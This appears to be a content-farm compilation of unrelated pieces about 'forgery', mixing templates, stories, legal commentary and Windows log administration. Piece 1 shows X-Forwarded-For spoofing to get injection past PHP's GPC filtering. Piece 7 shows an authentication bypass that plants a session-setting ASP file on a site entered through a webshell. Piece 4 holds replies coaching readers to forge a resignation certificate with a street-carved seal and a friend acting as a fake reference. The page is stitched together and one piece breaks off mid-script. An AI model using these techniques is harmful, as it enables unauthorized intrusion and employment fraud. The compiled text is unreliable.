对方伪造协议书的

时间：2022-12-24 04:05:53 作者：灰犀牛驾驶者合同范本收藏本文下载本文

“灰犀牛驾驶者”通过精心收集，向本站投稿了14篇对方伪造协议书的，小编在这里给大家带来对方伪造协议书的，希望大家喜欢!

目录
第1篇：简单伪造XForwardedFor第2篇：日志伪造第3篇：伪造离婚协议书第4篇：伪造离职证明第5篇：伪造虚假受伤日记第6篇：伪造借条签名犯法吗第7篇：伪造Session登陆后台第8篇：确认伪造借条方法第9篇：现代爱情故事：伪造情书第10篇：笔迹伪造鉴定申请书精选第11篇：如何称呼对方第12篇：伪造测井曲线的识别方法第13篇：Windows日志之保护及伪造第14篇：伪造日志文件的方法

篇1：简单伪造XForwardedFor

关于伪造X-Forwarded-For的目的我就不多说了，在入侵一个PHP站，GPC为ON的时候，

字符型注入全部歇菜，而在PHP5中，GPC默认是打开的。但是GPC对$_SERVER无任何影响，

因此可以通过伪造$_SERVER来达到注入的目的。

IP.php中有如下代码，主要是获取客户端IP：

function GetIP {

if (getenv(“HTTP_CLIENT_IP”)){

echo “getenvHTTP_CLIENT_IP”;

$ip = getenv(“HTTP_CLIENT_IP”);

}else if (getenv(“HTTP_X_FORWARDED_FOR”))

{

$ip = getenv(“HTTP_X_FORWARDED_FOR”);

echo “getenvHTTP_X_FORWARDED_FOR”;

echo “

you are right”;

}else if (getenv(“REMOTE_ADDR”)){

echo “getenvREMOTE_ADDR”;

$ip = getenv(“REMOTE_ADDR”);

}else{

echo “unknow”;

$ip = “Unknown”;

}

return $ip;

}

echo GetIp();

1.直接访问IP.PHP时，返回getenvREMOTE_ADDR127.0.0.1

2.用NC提交:

GET /1.php HTTP/1.1

Accept: */*

Referer: localhost/

Accept-Language: zh-cn

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MAXTHON 2.0)

Host: localhost

Connection: Keep-Alive

Cache-Control: no-cache

X-Forwarded-For: 127.0.0.2

Cookie: rtime=0; ltime=1269249140109; cnzz_eid=64110124-1269242429-; language=zh-cn; PHPSESSID=ae9b14609808b4ff4c5811ad1943c529

返回getenvHTTP_X_FORWARDED_FOR127.0.0.2，

伪造X-Forwarded-For成功。

要想提高程序的安全性，不是一个GPC可以解决的，必须提高程序的过滤机制，因为任何的参数提交都是有害的！

篇2：日志伪造

日志对于系统安全的作用是显而易见的，无论是网络管理员还是都非常重视日志，一个有经验的管理员往往能够迅速通过日志了解到系统的安全性能，而一个聪明的往往会在入侵成功后迅速清除掉对自己不利的日志，下面我们就来讨论一下日志的安全和创建问题。

一：概述：Windows2000的系统日志文件有应用程序日志，安全日志、系统日志、DNS服务器日志等等，应用程序日志、安全日志、系统日志、DNS日志默认位置：%systemroot%\\system32\\config，默认文件大小512KB。

安全日志文件：%systemroot%\\system32\\config\\SecEvent.EVT

系统日志文件：%systemroot%\\system32\\config\\SysEvent.EVT

应用程序日志文件：%systemroot%\\system32\\config\\AppEvent.EVT

这些LOG文件在注册表中的：

HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Eventlog

有的管理员很可能将这些日志重定位。其中EVENTLOG下面有很多的子表，里面可查到以上日志的定位目录。

二：作为网络管理员：

1。日志的安全配置：

默认的条件下，日志的大小为512KB大小，如果超出则会报错，并且不会再记录任何日志。所以首要任务是更改默认大小，具体方法：注册表中HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Eventlog对应的每个日志如系统，安全，应用程序等均有一个maxsize子键，修改即可，

下面给出一个来自微软站点的一个脚本，利用VMI来设定日志最大25MB,并允许日志自行覆盖14天前的日志：

该脚本利用的是WMI对象, WMI(Windows Management Instrumentation)技术是微软提供的Windows下的系统管理工具。通过该工具可以在本地或者管理客户端系统中几乎一切的信息。很多专业的网络管理工具都是基于WMI开发的。该工具在Win2000以及WinNT下是标准工具，在Win9X下是扩展安装选项。所以以下的代码在2000以上均可运行成功。

strComputer = “.”

Set bjWMIService = GetObject(“winmgmts:” _

& “{impersonationLevel=impersonate,(Security)}!\\\\” & _

strComputer & “oot\\cimv2”) '获得VMI对象

Set colLogFiles = objWMIService.ExecQuery _

(“Select * from Win32_NTEventLogFile”)

For each objLogfile in colLogFiles

strLogFileName = objLogfile.Name

Set wmiSWbemObject = GetObject _

(“winmgmts:{impersonationLevel=Impersonate}!\\\\.oot\\cimv2:” _

& “Win32_NTEventlogFile.Name='” & strLogFileName & “'”)

wmiSWbemObject.MaxFileSize = 2500000000

wmiSWbemObject.Overwrit

篇3：伪造离婚协议书

协议人：______，男， ________年____月____日生，身份证号：

现住____区____居__________________________室。

协议人：______，女， ________年____月____日生，身份证号：

现住____区____居__________________________室。

协议双方于________年____月____日在北京市朝阳区______乡政府登记结婚，于1991年____月____日生一子张子。现因双方性格严重不和，无法继续共同生活，且夫妻感情已完全破裂，故双方自愿离婚并达成以下协议：

一、双方自愿离婚，且均为完全民事行为能力人。

二、子女抚养：

儿子由男方抚养，女方每月15日前付抚养费2019元整，付款方式为女方从银行汇入男方银行卡中(卡号：________________)，直至儿子满18周岁。孩子大病、学校赞助费等大额支出，由双方平均负担。儿子18周岁以后所需的教育费等必要费用，再由双方协商解决。

三、女方探望权的行使：

女方每周六上午接孩子去共度周末，周日下午6点前必须送回。女方对孩子正常的探望方式男方不得以孩子不同意等理由予以干涉，遇特殊情况双方应以孩子意愿和孩子利益为重，友好协商解决。

四、夫妻共同财产的分割：

甲乙双方在婚姻关系存续期间没有共同财产，故不涉及分割共同财产。

五、保险的分割：

双方在________年共同为儿子办理的________终身保险，离婚后由双方平均负担保险费，同时原保险合同的受益人变更为______、______两个人。

六、债权债务的处理：

双方均无夫妻共同的债权及债务，如有其他债务，应由责任方个人承担。

七、本协议一式三份，双方各执一份，婚姻登记机关存档一份。本协议在双方签字并经婚姻登记机关办理相关手续后生效。

协议人：协议人：

年月日年月日

篇4：伪造离职证明

伪造离职证明

一、离职证明不是必要条件。一般情况下，原单位办理中止保险的时候需要单位填写一份减员表、开具一份离职证明;而新单位在办理新员工续保的手续时，社保局的工作人员不要离职证明，只要有前一单位的保险减员表、和新单位填写的保险增员表即可。

二、对于你自制假离职证明，本人是不支持的，但为了生活，为了找份好工作，给别人一个好印象也可以理解。

三、你的假离职证明有没有加盖公章啊?如果有的话就没有问题了。只是一份“离职”证明而已，不会对你有什么影响的，如果你的新单位想对你的其他方面作调查，相信早就做了不会等到现在的。

做好现在的工作吧，别担心了。不会有事的

不会查的,一般只是例行查询,你到街边刻个防伪章),然后自己开个离职证明,离职证明的文本格式最好正规些你可以在网上找一下范本. 如果每进一个新员工都要亲自核查原公司的是不太可能.电话是你朋友要提前沟通好

从个人保险上可以查出在职情况，即便你入职之后，被公司查出有虚假的情况，公司也可以依照劳动合同法第二十六条合同无效情形：以欺诈、胁迫的手段或者乘人之危，使对方在违背真实意思的情况下订立或者变更劳动合同的，到时公司解除劳动合同，也是得不偿失。建议还是提供上家公司的离职证明。

另外给大家提个醒，个人简历还是要真实为好，否则对个人信誉、信用及将来职业选择都会产生影响。。

唐骏的“简历门”已经闹得满城风雨了。。

公司人事部可以去你留的公司地址，查询原公司的电话，来查询!

不过如果你不是什么总监以上的高职位的话，公司人事一般不会去查，他要这个只是为以后出了事情避嫌，如社保没转移，和原公司有什么纠纷之类的!

没交社保的话，新公司可以直接吧你社保转过来的

上海的离职证明统一的是“退工单”，劳动者拿的那份是绿底黑字的`30克联单纸，需要有用人单位的人事负责人的签名和用人单位的公章，你要造假恐怕不太现实。如果原单位发现你与新单位建立了劳动关系，可以依法追究你和新单位的法律责任，造成损失的要赔偿。而新单位如果发现你造假实际没有办理离职手续，那么可以立即辞退你的，这是一定的!因为没有办理离职手续的，你的工作关系还在原单位，社保关系也在原单位没有转到社保中心，新单位是无法为你办理社保的，从这点上就可以说明你有问题。

篇5：伪造虚假受伤日记

伪造虚假受伤日记

你们知道吗？一支红笔和一支黑笔相结合起来的颜色画在手上就可以形成一个以假作真的伤痕，虽然滥竽充数，但是栩栩如生。这是我同桌叫我画的，看似逼真，血色鲜艳。早上上课，她画了一节课的伪造伤痕。

“请同学们翻到语文课本第XX页。”陈老师清脆而嘹亮的声音在教室里回荡，同学们的读书少朗朗上口。唯独我的同桌趴在桌子上，拿着一支黑笔和一支红笔在替换着涂擦手臂，她的手黑白相间，红色最多，很像刚摔过的伤痕，惟妙惟肖。我就问她：“你这个伤痕是真的吗？会痛吗？”她看到我单纯天真的眼神笑了笑，开心地说：“哈哈，这不是真的.，我用笔画的，你真是太单纯了吧？要不要我教你画？”我想了一会：如果真的能画出形象逼真的伤痕，家人看到，不就会心疼我啊？我脱口而出：“嗯嗯！”我快速地拿出红与黑笔，为了模拟真实示范，所有由她先来帮我画。

我的手被她两支笔重重的摩擦着，还有一丝痒和疼痛，我的手变成好红好红，就如同出血了似的，一道别刮伤的伤痕在手上，她又用黑色的笔涂，变成了被缝了几针的形状。她把伤痕周围的地方也涂成红色，摩擦摩擦，就宛如一个真实的伤痕。这道伤痕非常逼真，远看鲜红，近看露馅。

晚上放学回家的时候，妈妈看我真在写作业的手臂露了出来，正好是伤痕的地方，她看见后睁大眼睛，他欲哭无泪，说：“噢，宝贝你怎么了？你的手……“我打断了他，说：”诶妈妈这是我自己画上去的，是假的！“她抚摸我的伤口，没有一点的血痕，就大吼我：”你怎么能够这样？看把我着急的！“我捧腹大笑，我自己会画的伤痕她也信，哈哈哈～

篇6：伪造借条签名犯法吗

伪造借条签名犯法吗

【网友咨询】

请问律师，伪造四十万借条的签名，构成犯罪吗?

【律师解答】

该行为是否涉嫌犯罪以及涉嫌犯何种罪要结合行为人的主观目的来认定。

如果行为人出于通过诉讼非法占有对方财物的目的，那么行为人涉嫌诈骗罪，这种诈骗的方式从客观方面看，行为人实施了虚构事实、隐瞒真相的行为，并启动民事诉讼，意图通过虚假诉讼使对方为虚假的债务关系承担责任，其行为符合诈骗罪客观方面的犯罪构成，在犯罪理论上这种诈骗方式被称为“三角诈骗”。并且，诈骗数额为40万，属于数额特别巨大。当然，如果败诉了，属于犯罪未遂。

如果行为人故意帮助一方当事人伪造证据，根据行为人的动机和目的，行为人可能涉嫌诈骗罪(共犯)，也可能涉嫌伪造证据罪。与一方当事人合谋虚假诉讼的，涉嫌诈骗罪(共犯);受一方当事人欺骗，没有非法占有目的，而帮助伪造证据的，涉嫌伪造证据罪。

一、诈骗罪的罪名及法定刑：

诈骗公私财物，数额较大的，处三年以下有期徒刑、拘役或者管制，并处或者单处罚金;数额巨大或者有其他严重情节的，处三年以上十年以下有期徒刑，并处罚金;数额特别巨大或者有其他特别严重情节的，处十年以上有期徒刑或者无期徒刑，并处罚金或者没收财产。

二、诈骗罪数额的认定：

个人诈骗公私财物2千元以上的，属于“数额较大”;个人诈骗公私财物3万元以上的，属于“数额巨大”。个人诈骗公私财物20万元以上的，属于诈骗数额特别巨大。

三、伪造证据罪的罪名及法定刑：

帮助当事人毁灭、伪造证据，情节严重的，处三年以下有期徒刑或者拘役。

篇7：伪造Session登陆后台

前不久拿到一个站webshell

发现里面有个站程序还不错..可密码一直找不到..

看登陆验证代码的时候就想是否可以修改代码..绕过验证访问后台呢..记的以前nowthk教过我..可怜我这个记性啊..给忘了..又请教了下nowthk...

<% dim user_name,user_password,upwr,uID,ukey,cmd,rs

user_name=trim(request.form(“uid”))

user_password=trim(request.form(“pwd”))

user_password=jk_md5(user_password,“long”)

if user_name=“” or user_password=“” then

close_conn

response.redirect “../global/systeminfo.asp?flag=1”

end if

如果用户和密码为空就返回global/systeminfo.asp?flag=1 这个页面提示“错误帐号或密码，请重新登陆”

在往下看代码

session(“UID”)=rs(“UserName”)

session(“power”)=rs(“Power”)

Session(“PSW”)=rs(“PSW”)

rs.close:set rs=Nothing

set cmd=Nothing

close_conn

response.redirect(“../system/default.asp”)

如果UID,,power.PSW不为空就返回system/default.asp登陆成功

checkuser.asp代码为

if session(“UID”)=“” then

response.redirect “../gobal/systeminfo.asp?flag=1”

response.end

end if

session(“UID”)为空同样返回gobal/systeminfo.asp?flag=1

那也就是说只要UID参数不为空就登陆成功

然后把以下代码保存为1.asp

session(“UID”)=“1”

Session(“Power”)=“1”

先访问1.asp..然后再访问后台system/default.asp..绕过了验证..看到了后台管理页面

记录下..省的以后又忘记了

篇8：确认伪造借条方法

确认伪造借条方法

【案情】

原告秦某某与被告山东某置业有限公司建设工程施工合同纠纷一案，原告秦某某提供一份在借款人处加盖“山东某置业有限公司财务专用章”、签署日期为 “2011、6、15”的“借条”，主张被告向原告借款97万元。该“借条”内容为：“今借秦某某现金共计玖拾柒万元正(￥970000)。”被告对“借条”提出异议，主张该“借条”属原告利用其担任被告经理期间留存的加盖印章的空白纸制作而成。

【审理】

在案件审理过程中，针对被告对“借条”的真实性提出异议，并根据被告申请，法院委托鉴定机构对“借条”上加盖印章的时间进行鉴定。鉴于双方对6月15日另一张欠条上印章的真实性及加盖时间均无异议，且原告主张“借条”上加盖印章的时间亦为206月15日，法院委托法大法庭科学技术鉴定研究所对该 “借条”与另一张“欠条”上印章印文形成时间是否一致进行司法鉴定。经鉴定，法大法庭科学技术鉴定研究所作出“‘借条’中印章印文与‘欠条’中印章印文的相对形成时间检出差异”鉴定意见。双方当事人对司法鉴定机构的资质、鉴定程序及鉴定意见均无异议。结合双方当事人关于“借条”与“欠条”上印章印文形成时间的主张，法院对原告提供的2011年6月15日“借条”不予采信。

【评析】

在民间借贷中，一般借款人都要向出借人出具借条，以证明借款事实，并就借款的有关事项进行约定。在正常情况下，借条完全可以证明借款事实。在诉讼中，出借人只要出具了借条，就已经完成了举证责任。如无特殊情况，应该认定借条的证据效力。

然而在复杂的社会生活当中，确实存在凭空出具借条的情况。审判实践当中遇到的情况主要有以下几种：一是受威逼、胁迫，委心写下借条;二是赌债，无钱还不得已写下借条;三是伪造借条，如伪造签名、印章等;四是借条被出借人拿到后，出借人未实际向借款人付款;五是在饮酒、吸毒等失去意识的情况下出具的借条;六是对借条的数额、还款日期、利息约定等内容进行重大修改。

在这样的案件当中，被告往往会以上述理由，对借条的真实性提出抗辩。一旦这种情况发生，会给案件的审理带来很大的难度。对于此类，一般采取以下途径予以处理：

一是验证实际的资金流动。在经济交往中，任何资金的流动，必然要流下财务痕迹。特别是大额的现金流动，无论是企业还是个人一般都要涉及银行等财务机构。当事人如果在银行存取款，那么银行都会有收付款凭证。因此，法官可以依据根据申请到相关金融进行调查核实，或者要求当事人提供相关结算凭证。在诉讼中，如果当事人提出是现金交易，法官可以详细调查或询问，交易的时间、地点、在场证人等情况，并可要求当事人提供证人证言、现金来源、交付凭证等证据。

二是综合判断，形成内心确信。对于双方当事人提出证据的“对等”或不确定，仅凭一些重要证据难以判断借款是否真实存在的情况下，法官应发挥自己的主观能动性，尽可能还原事实的真相，并根据当事人的支付能力、交易习惯、以往的合作关系、借款金额大小等因素进行综合判断，形成内心确信。

三是技术鉴定。技术鉴定，是判断一个借条真实与否的最直接、有效的方法。在案件审理中，有的被告辩称欠条是伪造的，手印不是自己捺印，印章是假的等理由，此种情况，法官应告知被告限期申请司法鉴定的权利和义务，逾期视为其主张不成立。申请鉴定的，视鉴定结论再做案件事实的认定。技术鉴定虽然可以有效判断借条的真实性，但是它存在很大的局限性。很多借条因缺少比对样本等原因，无法进行鉴定。

本案中，针对当事人提出“伪造”证据的抗辩理由，法官在具备鉴定条件的情况下，利用第三种方法，即技术鉴定，及时确定了异议借条的证据效力，为案件正确处理奠定了基础。

篇9：现代爱情故事：伪造情书

平生伪造过的文字，是一封情书。

北大荒，一年的日子，有半年与白雪相对。雪之单纯、单调让人觉得无聊。打发日子最好的办法是打赌，其次是恶作剧。

壶盖是我一校友的外号，缘自何起因已记不起来了。壶盖比我们年长一两岁，以脏、懒、馋而遭人厌。壶盖身上养了不少虫：以虱子为多(地面部队)，臭虫次之(坦克部队)，跳蚤又次(空降兵)。壶盖因虫累赘而面色苍白，终日坐在那儿，将手探入衣服，清点、整编他的三军。时有自语式的演说嗫嚅出口。壶盖大多数精力都用来对付那些虫子了，生活消沉，落寞。

想伪造一封情书给他，是我另一位校友烧鸡的主意。大概是想对其低落的情绪有所启发。主意出了，由我来写。当年并没有见过《情书大全》、《席慕容诗集》类的书，只有凭空造句。为生动起见借用了一些当地的俗语和语气词。还记得其中一些文字：“×××：你这小伙儿真不错!俗话说，浇花要浇根，浇(交)人要交心……你如想与我相识、相知、相爱的话，咱们×日中午在供销社门口相会……”署名用了当时很流行的“知名不具”。全文广用感叹号，烧鸡读完后很觉不错，为表示对我文字的钦敬，买了一瓶劣质草籽酒奖赏我(追溯起来，那该算我挣的第一笔稿酬)。

情书放在了壶盖脏而乱的铺上。大家边打扑克边留意他的种种举动。他大致的过程是：进屋，爬上铺，发现情书，坐读一遍，卧读一遍，背身读一遍，呆想一遍，收起情书，此时有光彩从脸上溢出。

接下来几天，壶盖大烧热水，洗煮自己的被褥和衣裤。因颜色间的相互感染，宿舍中晾满了色彩可疑的裤褂。此间他去外连筹借到了一件呢子外衣和一双懒汉鞋，一副皮手套。

大家知道他在为那个虚假的相约而狂热地准备着。转眼全连三百多知青都知道了，独瞒着他一人。这有点残酷，我曾试着点了他两次，没用，他很兴奋，这戏必须演完了才能收场。

那是个壮烈的场面，壶盖在漫天的大雪中，穿着单薄不太合身的服饰站到了供销社门口。全连的男女知青，在后窗户中看着他。雪落在他头上，雪落在他的睫毛上，壶盖平静而坚定地站着，专心地等着那个时间的到来，甚至从头上掸去雪花的空暇都没有。他被单纯的雪染白着……

羞辱从我们的心里生出来，壶盖的坚定坦白，让人惭愧。烧鸡打开后窗户喊他。直至两个人跳出去，把他架了回来。

以后的几天，他依旧穿着那服饰沉默地出入。大家有点担心，有天晚上，我拿出那瓶草籽酒来，要求与他共享。他喝到中间时说并不因为这事而恨我们。至今他也不相信那封信是假的，他知道有一个女孩会为他写这样炽烈的信。她总有一天会再与他相约。

他没什么可该劝慰的，他比我活得痛快，他心里有了期待。

篇10：笔迹伪造鉴定申请书精选

申请人：

住址：

身份证号码：

联系方式：

申请事项：

依法申请鉴定：20__年5月6日从申请人的银行帐号中取出25000美元的储蓄取款凭条上的签名，是由被告所代签，不是申请人本人所签。

事实与理由

申请人与被告因返还财物纠纷一案已诉于人民法院。申请人申请法庭从银行调取的20__年5月6日取款凭条上的朝鲁门三个字，不是申请人自己所签，而是由被告代签的。

当时申请人与被告之间是男女朋友(恋爱关系)，被告为了完成其业务任务并同时可以炒外汇，于是从申请人的帐号中取出了25000美元，并存进了其自己的帐户,朝鲁门三个字是由被告苏日娅代签的.

另根据银行的外汇管理规定，当日提取外汇不得超过 10000 美元。只有内部员工才有机会可以提取 .

现为了便于法庭查清本案的事实，确认是被告从申请人帐户中取出了 25000 美元的事实 ,故申请人特依法申请笔迹鉴定

__人民法院

篇11：如何称呼对方

如何称呼对方

Every office has its own protocol for who is called by his or her first name and who is called by his or her title. New employees should follow suit, after listening carefully to how people are addressed.

对于男女同事的名称或职位的称呼，各个公司有不同的.规矩。新雇员应该注意他们相互如何称呼而效仿。

If yours is a “title” office, but you call your boss Charlie when meeting alone, you should still call him Mr. Dodd when others are around.

如果您的公司规矩是称呼职位，那么在单独会见时，您可以直呼老板查理，而有其他人在场时，应称其多迪先生。

If yours is an informal office, you still should wait for the other person to say, “Please call me Jim,” before doing so, if he has been introduced to you as “Mr. Culyer.”

如果您的公司比较随便，您最好还是等到别人把“库叶先生”介绍给您后再如此称呼。在此之前，你还是要等他对你说：“请叫我吉姆吧。”

Everyone, no matter whether the office is formal of informal, has a name. No assistant should ever be referred to as “my girl.” She is, if a possessive must be used, “Charlene Walter, my assistant,” or “Angela Badalato, my assistant.”

无论公司是否有无规矩，每个人都有称呼。不是每个经理助理都可以用类似“姑娘”的倪称来称呼。如果必须说明所属关系，则应如此介绍：“这是我的助理，沙琳・沃尔特”或：“这是我的助理，安吉拉・巴德拉多”。

篇12：伪造测井曲线的识别方法

伪造测井曲线的识别方法

在煤田地质勘探中,测井资料作为钻探资料的补充和验证,已成为煤田地质勘探必不可少的重要手段.较之数字测井以前,伪造测井资料几乎是不可能的,因此,测井曲线是鉴别地质资料可靠程度的重要依据.但目前流行的部分数字测井系统存在着严重缺陷,伪造测井曲线易如反掌,致使极少数煤田地质勘查队伍出现伪造测井曲线的现象,导致煤田地质勘查资料严重失实.伪造测井曲线的主要技术手段是依靠软件对部分测井数据进行复制,伪造的.测进曲线有三种特征:重复性、矛盾性和不协调性,该特征是识别伪造曲线的主要标志.在实际工作中,可先查看测井记录是否为明码记录,然后再依据伪造测井曲线特征对测井资料进行识别,必要时可索取原始测井记录曲线予以核对.

作者：罗忠文 Luo Zhongwen 作者单位：贵州省煤田地质局,贵州,贵阳,550006 刊名：中国煤炭地质英文刊名：COAL GEOLOGY OF CHINA 年，卷(期)：2009 21(2) 分类号：P631.8 关键词：测井曲线地质资料测井资料鉴别伪造数据

篇13：Windows日志之保护及伪造

一：概述：

Windows 2000的系统日志文件有应用程序日志，安全日志、系统日志、DNS服务器日志等等，应用程序日志、安全日志、系统日志、DNS日志默认位置：%systemroot%\\system32\\config，默认文件大小512KB。

安全日志文件：%systemroot%\\system32\\config\\SecEvent.EVT

系统日志文件：%systemroot%\\system32\\config\\SysEvent.EVT

应用程序日志文件：%systemroot%\\system32\\config\\AppEvent.EVT

这些LOG文件在注册表中的： HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Eventlog有的管理员很可能将这些日志重定位。其中EVENTLOG下面有很多的子表，里面可查到以上日志的定位目录。

二：作为网络管理员：

1.日志的安全配置：

下面给出一个来自微软站点的一个脚本，利用VMI来设定日志最大25MB,并允许日志自行覆盖14天前的日志：该脚本利用的是WMI对象, WMI（Windows Management Instrumentation）技术是微软提供的Windows下的系统管理工具。通过该工具可以在本地或者管理客户端系统中几乎一切的信息。很多专业的网络管理工具都是基于WMI开发的。该工具在Win2000以及WinNT下是标准工具，在Win9X下是扩展安装选项。所以以下的代码在2000以上均可运行成功。 strComputer = . Set objWMIService = GetObject（winmgmts: _ {impersonationLevel=impersonate,（Security）}!\\\\ _ strComputer \\root\\cimv2） ''获得VMI对象 Set colLogFiles = objWMIService.ExecQuery _ （Select * from Win32_NTEventLogFile） For each objLogfile in colLogFiles strLogFileName = objLogfile.Name Set wmiSWbemObject = GetObject _ （winmgmts:{impersonationLevel=Impersonate}!\\\\.\\root\\cimv2: _ Win32_NTEventlogFile.Name='' strLogFileName ''） wmiSWbemObject.MaxFileSize = 2500000000 wmiSWbemObject.OverwriteOutdated = 14 wmiSWbemObject.Put_ Next 将上述脚本用记事本存盘为vbs为后缀的即可使用，

另外需要说明的是代码中的strComputer=.在Windows脚本中的含义相当于localhost,如果要在远程主机上执行代码，只需要把.改动为主机名,当然首先得拥有对方主机的管理员权限并建立IPC连接.本文中的代码所出现的strComputer均可作如此改动。

2. 日志的查询与备份：

一个优秀的管理员是应该养成备份日志的习惯，如果有条件的话还应该把日志转存到备份机器上或直接转储到打印机上，在这里推荐微软的resourceKit工具箱中的dumpel.exe，他的常用方法： dumpel -f filename -s \\\\server -l log -f filename 输出日志的位置和文件名 -s \\\\server 输出远程计算机日志 -l log log 可选的为system,security,application,可能还有别的如DNS等.

如要把目标服务器server上的系统日志转存为backupsystem.log可以用以下格式： dumpel \\\\server -l system -f backupsystem.log 再利用计划任务可以实现定期备份系统日志。另外利用脚本编程的VMI对象也可以轻而易举的实现日志备份：

下面给出备份application日志的代码： backuplog.vbs strComputer = . Set objWMIService = GetObject（winmgmts: _ {impersonationLevel=impersonate,（Backup）}!\\\\ _ strComputer \\root\\cimv2） ''获得 VMI对象 Set colLogFiles = objWMIService.ExecQuery _ （Select * from Win32_NTEventLogFile where LogFileName=''Application''） ''获取日志对象中的应用程序日志 For Each objLogfile in colLogFiles errBackupLog = objLogFile.BackupEventLog（f:\\application.evt） ''将日志备份为f:\\application.evt If errBackupLog 0 Then Wscript.Echo The Application event log could not be backed up. else Wscript.Echo success backup log End If Next 程序说明：如果备份成功将窗口提示：success backup log 否则提示：The Application event log could not be backed up,此处备份的日志为application 备份位置为f:\\application.evt,可以自行修改，此处备份的格式为evt的原始格式，用记事本打开则为乱码，这一点他不如dumpel用得方便。